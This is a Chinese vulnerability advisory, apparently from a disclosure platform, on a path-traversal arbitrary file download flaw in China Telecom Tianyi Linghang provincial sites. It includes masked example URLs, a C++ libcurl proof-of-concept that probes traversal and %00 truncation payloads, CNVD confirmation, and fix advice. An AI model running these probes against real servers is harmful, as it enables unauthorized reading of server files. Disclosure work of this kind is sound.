2016-01-06: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
中国电信天翼领航多个分站任意文件下载漏洞 (附C++ libcurl测试脚本)
【天翼领航主站】:**.**.**.**【以下5个省份存在通用的任意文件下载漏洞】天津:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=/../../../../download2.jsp山西:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp广西:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp河北:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp云南:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp【C++ libcurl脚本测试】
【POC】
最近在学习 libcurl,厂商可以编译下面的程序来进行修复检测:输入基础 URL(从上面的链接看应为 http://主机/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file= ,请按实际情况核对),程序依次尝试直接文件名、1~10 级 /.. 目录穿越、以及带 %00 截断的穿越三种变体。注意:程序只根据 HTTP 状态码和响应体判断,输出 YES 仅说明服务器返回了内容,仍需人工核对保存在 passwd 文件中的响应是否确为 download2.jsp 的源码;输出 NO 也不等于已修复(可能是 WAF 拦截、路径层级未命中等)。Win 平台 VS2010 下编译通过;Linux 下请修改头文件。
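/*
 * Probe for the xbnet-si download2.jsp arbitrary-file-download issue.
 *
 * Reads one base URL from stdin (the advisory's download2.jsp URL up to and
 * including "download_file=") and asks the server for download2.jsp itself in
 * three ways: by plain name, through 1..MAX_DEPTH levels of "/.." traversal,
 * and the same traversal with a trailing "%00" (null-byte truncation).
 *
 * A probe counts as YES only when the server answers HTTP 200 with a
 * non-empty body; that body is then appended to the file "passwd" together
 * with the URL that produced it, so the result can be inspected by hand.
 * 204/304 (no body) are no longer treated as hits, and failed transfers are
 * reported instead of being written out.
 *
 * Windows (VS2010, static libcurl) and POSIX builds share this source: the
 * Windows-only header and link pragmas are #ifdef'd.
 */
#define CURL_STATICLIB            /* must be defined before curl.h for a static libcurl */
#ifdef _WIN32
#define _CRT_SECURE_NO_WARNINGS   /* fopen/fgets are used deliberately; silence C4996 */
#include <Windows.h>
#pragma comment(lib, "libcurl.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "winmm.lib")
#pragma comment(lib, "wldap32.lib")
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <string>
#include <iostream>
#include "curl/curl.h"

using namespace std;

enum { URL_MAX = 512, MAX_DEPTH = 10 };

/* Accumulated response body for one probe; data is NUL-terminated once len > 0. */
struct probe_body {
    char *data;
    size_t len;
};

/*
 * CURLOPT_WRITEFUNCTION target: appends one chunk to the probe_body passed
 * as CURLOPT_WRITEDATA. Returns the number of bytes consumed; returning less
 * than size*nmemb makes libcurl abort the transfer (used here on OOM).
 */
size_t write_callback(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct probe_body *body = (struct probe_body *)userdata;
    size_t n = size * nmemb;

    char *grown = (char *)realloc(body->data, body->len + n + 1);
    if (!grown) {
        return 0;
    }
    body->data = grown;
    memcpy(body->data + body->len, ptr, n);
    body->len += n;
    body->data[body->len] = '\0';
    return n;
}

/*
 * Appends s to out at *pos, keeping room for the terminating NUL.
 * Returns 0 and advances *pos, or -1 (out untouched) if s does not fit.
 * Hand-rolled because VS2010 has no C99 snprintf.
 */
int append_str(char *out, size_t outsz, size_t *pos, const char *s)
{
    size_t n = strlen(s);
    if (*pos >= outsz || n >= outsz - *pos) {
        return -1;
    }
    memcpy(out + *pos, s, n + 1);
    *pos += n;
    return 0;
}

/*
 * Builds base + depth x "/.." + suffix into out (outsz bytes).
 * Returns 0 on success, -1 on bad arguments or when the result would not fit.
 */
int build_probe_url(char *out, size_t outsz, const char *base, int depth, const char *suffix)
{
    if (!out || outsz == 0 || !base || !suffix || depth < 0) {
        return -1;
    }
    size_t pos = 0;
    out[0] = '\0';
    if (append_str(out, outsz, &pos, base) != 0) {
        return -1;
    }
    for (int i = 0; i < depth; i++) {
        if (append_str(out, outsz, &pos, "/..") != 0) {
            return -1;
        }
    }
    return append_str(out, outsz, &pos, suffix);
}

/*
 * Fetches url and prints YES/NO. Returns 1 when the server answered HTTP 200
 * with a non-empty body (the body is appended to out, if non-NULL), 0 for any
 * other status, -1 when the transfer itself failed.
 */
int probe_url(const char *url, FILE *out)
{
    printf("%s\n", url);

    CURL *curl = curl_easy_init();
    if (!curl) {
        fputs("curl_easy_init failed\n", stderr);
        return -1;
    }

    struct probe_body body = { NULL, 0 };
    curl_easy_setopt(curl, CURLOPT_URL, url);
#if LIBCURL_VERSION_NUM >= 0x072a00
    /* libcurl >= 7.42 can squash "/.." in the path component before sending;
     * keep the traversal sequences exactly as built (in a query string they
     * are left alone either way). */
    curl_easy_setopt(curl, CURLOPT_PATH_AS_IS, 1L);
#endif
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &body);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, 30L);   /* never hang on a dead host */

    int hit;
    CURLcode res = curl_easy_perform(curl);
    if (res != CURLE_OK) {
        printf("ERROR: %s\n", curl_easy_strerror(res));
        hit = -1;
    } else {
        long status = 0;
        curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &status);
        hit = (status == 200 && body.len > 0) ? 1 : 0;
        puts(hit ? "YES" : "NO");
        if (hit && out) {
            fprintf(out, "==== %s (HTTP %ld, %lu bytes)\n", url, status, (unsigned long)body.len);
            fwrite(body.data, 1, body.len, out);
            fputc('\n', out);
            /* Heuristic only: JSP source normally carries "<%" scriptlet tags,
             * a 200 with an HTML error page does not. Confirm by reading the file. */
            if (strstr(body.data, "<%")) {
                puts("  (body contains \"<%\" - looks like JSP source, verify in passwd)");
            }
        }
    }

    curl_easy_cleanup(curl);
    free(body.data);
    return hit;
}

/*
 * Entry point. Prompts for the base URL, runs the three probe families and
 * reports how many returned a body. Exit status: 0 after a completed run,
 * 1 when input, libcurl initialisation or the output file fails.
 */
int main()
{
    char base[URL_MAX];
    char url[URL_MAX];

    printf("base URL (up to and including download_file=): ");
    fflush(stdout);
    if (!fgets(base, sizeof base, stdin)) {
        fputs("no input\n", stderr);
        return 1;
    }
    base[strcspn(base, "\r\n")] = '\0';   /* drop the newline fgets keeps */
    if (base[0] == '\0') {
        fputs("empty base URL\n", stderr);
        return 1;
    }

    if (curl_global_init(CURL_GLOBAL_DEFAULT) != CURLE_OK) {
        fputs("curl_global_init failed\n", stderr);
        return 1;
    }
    FILE *out = fopen("passwd", "ab");
    if (!out) {
        perror("passwd");
        curl_global_cleanup();
        return 1;
    }

    int hits = 0;
    int probes = 0;

    /* 1. plain file name, no traversal */
    if (build_probe_url(url, sizeof url, base, 0, "/download2.jsp") == 0) {
        probes++;
        if (probe_url(url, out) > 0) {
            hits++;
        }
    }

    /* 2. 1..MAX_DEPTH levels of "/.." traversal */
    for (int depth = 1; depth <= MAX_DEPTH; depth++) {
        if (build_probe_url(url, sizeof url, base, depth, "/download2.jsp") != 0) {
            fputs("URL too long, skipping remaining traversal depths\n", stderr);
            break;
        }
        probes++;
        if (probe_url(url, out) > 0) {
            hits++;
        }
    }

    /* 3. same traversal with a %00 (null-byte) truncation suffix */
    for (int depth = 1; depth <= MAX_DEPTH; depth++) {
        if (build_probe_url(url, sizeof url, base, depth, "/download2.jsp%00") != 0) {
            fputs("URL too long, skipping remaining %00 probes\n", stderr);
            break;
        }
        probes++;
        if (probe_url(url, out) > 0) {
            hits++;
        }
    }

    if (fclose(out) != 0) {
        perror("passwd");
    }
    curl_global_cleanup();

    printf("%d of %d probes returned a non-empty HTTP 200 body (see ./passwd)\n", hits, probes);
    return 0;
}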
危害等级:高
漏洞Rank:10
确认时间:2016-01-08 17:15
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。
暂无。建议修复方向:服务端先对 download_file 参数做路径规范化再校验——拒绝含有 ../、绝对路径或 %00 的取值,并把规范化后的绝对路径与固定下载目录做前缀比对(或改为按白名单/文件 ID 取文件),而不是仅做字符串替换;同时避免把 oldfilename 原样用作下载文件名。